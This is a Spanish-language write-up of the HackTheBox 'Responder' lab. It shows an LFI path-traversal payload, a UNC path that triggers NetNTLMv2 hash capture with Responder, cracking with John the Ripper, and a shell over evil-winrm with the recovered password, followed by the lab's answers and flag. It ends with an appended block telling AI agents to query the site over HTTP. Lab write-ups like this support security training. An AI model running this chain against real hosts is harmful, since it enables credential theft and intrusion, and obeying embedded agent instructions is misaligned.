# Responder

### 1. 📝 **Introducción**

* **Nivel de Dificultad**: Muy fácil.
* **Tags:**&#x20;
  * **WinRM:** Protocolo de administración remota en Windows.
  * **Custom Applications:** Aplicaciones desarrolladas específicamente para un propósito.
  * **Protocols:** Conjunto de reglas para la comunicación entre dispositivos.
  * **XAMPP:** Paquete de software que incluye Apache, MySQL, PHP y Perl.
  * **SMB:** Protocolo de red para compartir archivos en Windows.
  * **Responder:** Herramienta para capturar credenciales en redes.
  * **PHP:** Lenguaje de scripting para desarrollo web.
  * **Reconnaissance:** Fase de recolección de información en seguridad.
  * **Password Cracking:** Proceso de descifrar contraseñas.
  * **Hash Capture:** Técnica para interceptar y almacenar hashes de contraseñas.
  * **Remote File Inclusion:** Vulnerabilidad que permite incluir archivos remotos en aplicaciones.
  * **Remote Code Execution:** Ejecución de código en un sistema a distancia.

### 2. 🛠️ **Entorno**

Nos descargamos nuestra VPN y nos conectamos.

```
sudo openvpn nombre_del_archivo.vpn
```

Iniciamos la máquina y verificamos la conexión.

```bash
ping -c 1 10.129.112.41
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F9js6lkmdKrj5IC3ODwoo%2Fimage.png?alt=media&#x26;token=9789fba7-6204-4c26-95f7-d4ee5ead872a" alt=""><figcaption></figcaption></figure>

Observamos que tenemos conexión y que es una máquina **Windows** ya que su **ttl=127**.

### 3. 🔍 **Reconocimiento**

A continuación, se realiza el comando:

```bash
nmap -p- --min-rate 5000 -sV 10.129.112.41
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F7U3oAKLEwTSY3EENyTkL%2Fimage.png?alt=media&#x26;token=57287e68-ac27-4b77-bbdc-9a96fb170a46" alt=""><figcaption></figcaption></figure>

### 4. 🚪 **Acceso Inicial**

Como podemos observar durante el escaneo, el **puerto 80** está abierto y está sirviendo **HTTP** con Apache httpd 2.4.52 (Win64) junto con OpenSSL/1.1.1m y PHP/8.1.1. Además, el **puerto 5985** está abierto y está sirviendo **HTTP** con Microsoft HTTPAPI httpd 2.0 (utilizado por SSDP/UPnP). Por último, el **puerto 7680** está abierto, pero no se identifica claramente el servicio asociado, indicado como `pando-pub`. Todos estos servicios están corriendo en un sistema operativo Windows, lo que nos llevará a investigar más a fondo.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FfS0ZNUWluZf8Lt5z6xKW%2Fimage.png?alt=media&#x26;token=f212c767-590c-4c60-a2d2-c167de648ecd" alt=""><figcaption></figcaption></figure>

Hay que añadir en el `/etc/hosts` el dominio de **unika.htb** con la IP. Se recarga la página.

```bash
10.129.112.41    unika.htb
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FTQIhzVRayyZdyWQhhLHJ%2Fimage.png?alt=media&#x26;token=04d637ae-1644-4d2a-9732-84fb319ba771" alt=""><figcaption></figcaption></figure>

Revisando el código fuente nos encontramos una vulnerabilidad LFI y nos damos cuenta cuándo la página cambia de idioma.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FGtY8S4SX54JHNzzHS2Dy%2Fimage.png?alt=media&#x26;token=59fe2452-47f9-4a06-9b90-3a57d357465e" alt=""><figcaption></figcaption></figure>

El enlace intenta explotar una vulnerabilidad de **Inclusión de Archivos Locales** (LFI) en la aplicación web. Al acceder a la URL, estamos intentando cargar y mostrar el contenido del archivo `hosts` del sistema operativo Windows en el servidor, ubicado en `C:\Windows\System32\drivers\etc\hosts`. Esta vulnerabilidad nos permitiría leer archivos arbitrarios del sistema.

```bash
http://unika.htb/index.php?page=../../../../../../../../../../windows/system32/drivers/etc/hosts
```

Funciona.  Vamos a intentar capturar el **hash NetNTLMv2** del administrador utilizando **Responder**. Para entender mejor el proceso, expliquemos brevemente lo que haremos.

Aprovechando la vulnerabilidad de **LFI** (Local File Inclusion), pediremos al servidor que intente conectarse a un recurso SMB en nuestra máquina local. Al hacer esto, el servidor Windows tratará de autenticarse con nuestra máquina utilizando el protocolo NTLM (New Technology Lan Manager), que es un sistema de autenticación desafío-respuesta desarrollado por Microsoft.

Durante este proceso, NTLM generará una cadena específicamente formateada que incluye tanto el desafío como la respuesta. Esta cadena es conocida como **NetNTLMv2**. Aunque comúnmente se le llama "hash NetNTLMv2", técnicamente no es un hash tradicional, pero se ataca de manera similar.

Con **Responder**, capturaremos esta cadena NetNTLMv2. Luego intentaremos descifrarla utilizando **John The Ripper** para ver qué información podemos obtener y cómo podemos usarla.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FrA25pVMs8cDL1Oo64cZD%2Fimage.png?alt=media&#x26;token=526c335e-c269-445b-8772-7d05f04b410c" alt=""><figcaption></figcaption></figure>

Lo primero que haremos será iniciar **Responder**, configurándolo para que escuche en la interfaz de red `tun1`, que es la interfaz por la que estamos conectados al servidor remoto. Nuestra IP, según ve el servidor, es `10.10.16.97`.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fh4loBYylwIE8CbfxBeDu%2Fimage.png?alt=media&#x26;token=f387ff11-15a5-43c3-ae2d-748be687a0a0" alt=""><figcaption></figcaption></figure>

Ahora, volvemos al navegador y cargamos la siguiente URL:

```ruby
http://unika.htb/?page=//10.10.xx.xx/algo
```

Con esta acción, estamos indicando al servidor que intente acceder al recurso “algo” que supuestamente está disponible en un equipo remoto (nuestro equipo con la IP `10.10.xx.xx`) a través del protocolo SMB. Luego, regresamos a nuestro terminal donde está corriendo **Responder** para monitorear cualquier intento de autenticación que el servidor haga hacia nuestra máquina.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FR7bzOBRX40e9p0mNJ3u8%2Fimage.png?alt=media&#x26;token=0676e059-c79b-454a-99a1-2b6819a51ef6" alt=""><figcaption></figcaption></figure>

Con esto observamos que nos captura el hash. Copiamos el valor del hash NTLMv2 capturado y lo guardamos en un nuevo archivo. Luego, utilizamos el diccionario `rockyou.txt` para intentar descifrar el hash con **John the Ripper**.

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt script.hash
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fj0PXtzwCxew8nJb33Abq%2Fimage.png?alt=media&#x26;token=c580f305-d7c5-4fb8-b8a1-a987a59c294b" alt=""><figcaption></figcaption></figure>

Hemos obtenido la contraseña del usuario Administrador, por lo que ahora vamos a investigar el puerto **5985**. Para más detalles sobre este puerto, podemos consultar la siguiente página: [SpeedGuide - Puerto 5985](https://www.speedguide.net/port.php?port=5985). Pertenece al servicio WinRM por lo que hay que investigar como explotarlo. Para obtener más detalles sobre cómo explotar este servicio, podemos consultar la siguiente página: [Pentesting - WinRM](https://pentesting.mrw0l05zyn.cl/explotacion/servicios/5985-tcp-5986-tcp-winrm).

```bash
evil-winrm -i 10.129.112.41 -u administrator -p badminton
```

### 5. 🔑 **Captura de la Flag**

Una vez que nos conectemos usando **evil-winrm**, obtendremos una shell que nos permitirá explorar el servidor remoto en busca de nuestra flag. Indagamos a través de los directorios.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F0Ej6AUwQLeHZNjYuWWgj%2Fimage.png?alt=media&#x26;token=6d9c43c9-dcda-45b9-b878-e1da99f2389a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FMZ9uBxMHQj8x68SNgCgj%2Fimage.png?alt=media&#x26;token=38f6dce5-4366-4897-8f0a-d007398af6b0" alt=""><figcaption></figcaption></figure>

### 6. ❓Preguntas

#### **Tarea 1:** ¿A qué dominio somos redirigidos al visitar el servicio web utilizando la dirección IP?

**unika.htb**&#x20;

*Al visitar el servicio web con la dirección IP, somos redirigidos al dominio `unika.htb`.*

#### **Tarea 2:** ¿Qué lenguaje de scripting se está utilizando en el servidor para generar las páginas web?

**php**&#x20;

*El servidor utiliza el lenguaje de scripting **PHP** para generar las páginas web.*

#### **Tarea 3:** ¿Cuál es el nombre del parámetro de URL que se usa para cargar diferentes versiones de idioma de la página web?

**page**&#x20;

*El parámetro de URL utilizado para cargar diferentes versiones de idioma es **page**.*

#### **Tarea 4:** ¿Cuál de los siguientes valores para el parámetro `page` sería un ejemplo de explotación de una vulnerabilidad de Inclusión de Archivos Locales (LFI)?

**../../../../../../../../windows/system32/drivers/etc/hosts**&#x20;

*El valor `../../../../../../../../windows/system32/drivers/etc/hosts` es un ejemplo de explotación de una vulnerabilidad de Inclusión de Archivos Locales (LFI).*

#### **Tarea 5:** ¿Cuál de los siguientes valores para el parámetro `page` sería un ejemplo de explotación de una vulnerabilidad de Inclusión de Archivos Remotos (RFI)?

**//10.10.14.6/somefile**&#x20;

*El valor `//10.10.14.6/somefile` es un ejemplo de explotación de una vulnerabilidad de Inclusión de Archivos Remotos (RFI).*

#### **Tarea 6:** ¿Qué significa NTLM?

**New Technology Lan Manager**&#x20;

*NTLM significa **New Technology Lan Manager**.*

#### **Tarea 7:** ¿Qué flag utilizamos en la utilidad Responder para especificar la interfaz de red?

**-I**&#x20;

*El flag `-I` en la utilidad **Responder** se utiliza para especificar la interfaz de red.*

#### **Tarea 8:** Existen varias herramientas que toman un desafío/respuesta NetNTLMv2 y prueban millones de contraseñas para ver si alguna genera la misma respuesta. Una de estas herramientas se conoce comúnmente como `john`, pero ¿cuál es su nombre completo?

**John The Ripper**&#x20;

*El nombre completo de la herramienta comúnmente conocida como `john` es **John The Ripper**.*

#### **Tarea 9:** ¿Cuál es la contraseña del usuario administrador?

**badminton**&#x20;

*La contraseña del usuario administrador es **badminton**.*

#### **Tarea 10:** Usaremos un servicio de Windows (es decir, ejecutándose en la máquina) para acceder remotamente a la máquina de Responder utilizando la contraseña que recuperamos. ¿En qué puerto TCP escucha?

**5985**&#x20;

*El servicio de Windows al que accedemos remotamente utiliza el puerto TCP **5985**.*

#### Tarea 11: Enviar Flag

ea81b7afddd03efaa0945333ed147fac

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FVdZ1nWi4jsSkvVf3hPLX%2Fimage.png?alt=media&#x26;token=a6b7bf2a-d42a-4e45-ad18-0ab43cd37110" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://beafn28.gitbook.io/beafn28/writeups/hackthebox/starting-point/responder.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
